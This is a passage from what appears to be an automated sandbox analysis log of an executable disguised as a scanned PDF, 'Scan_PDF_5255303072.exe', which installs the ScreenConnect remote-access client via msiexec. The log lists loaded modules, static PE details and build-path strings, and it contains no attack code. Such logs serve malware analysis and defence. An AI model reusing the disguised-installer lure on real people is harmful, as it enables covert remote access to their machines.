                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeSection loaded: virtdisk.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeSection loaded: fltlib.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msihnd.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: virtdisk.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: fltlib.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: samcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: samlib.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: virtdisk.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: fltlib.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: virtdisk.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: fltlib.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: wtsapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: licensemanagersvc.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: licensemanager.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                              Source: Scan_PDF_5255303072.exeStatic PE information: certificate valid
                              Source: Scan_PDF_5255303072.exeStatic file information: File size 5685032 > 1048576
                              Source: Scan_PDF_5255303072.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x533200
                              Source: Scan_PDF_5255303072.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                              Source: Scan_PDF_5255303072.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                              Source: Scan_PDF_5255303072.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                              Source: Scan_PDF_5255303072.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: Scan_PDF_5255303072.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                              Source: Scan_PDF_5255303072.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                              Source: Scan_PDF_5255303072.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Source: Scan_PDF_5255303072.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1486417098.0000000002412000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1442912200.00000000003B2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: Scan_PDF_5255303072.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: Scan_PDF_5255303072.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: Scan_PDF_5255303072.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.3.dr
                              Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2638310867.0000000002C27000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1501555256.00000000124A0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: Scan_PDF_5255303072.exe, ScreenConnect.Core.dll.5.dr, ScreenConnect.Core.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2621215881.0000000002641000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1503870497.000000001B062000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1486251470.00000000023D0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1486728032.0000000002491000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.3.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: Scan_PDF_5255303072.exe
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000008.00000000.1418668144.0000000000F3D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: Scan_PDF_5255303072.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000005.00000003.1392487484.00000000041A0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1390246679.0000000004310000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000005.00000003.1390246679.00000000042A1000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.5.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: Scan_PDF_5255303072.exe, 4a71ec.msi.3.dr, MSI74E9.tmp.3.dr, 4a71ee.msi.3.dr, MSI74FA.tmp.3.dr, 4a71ed.rbs.3.dr
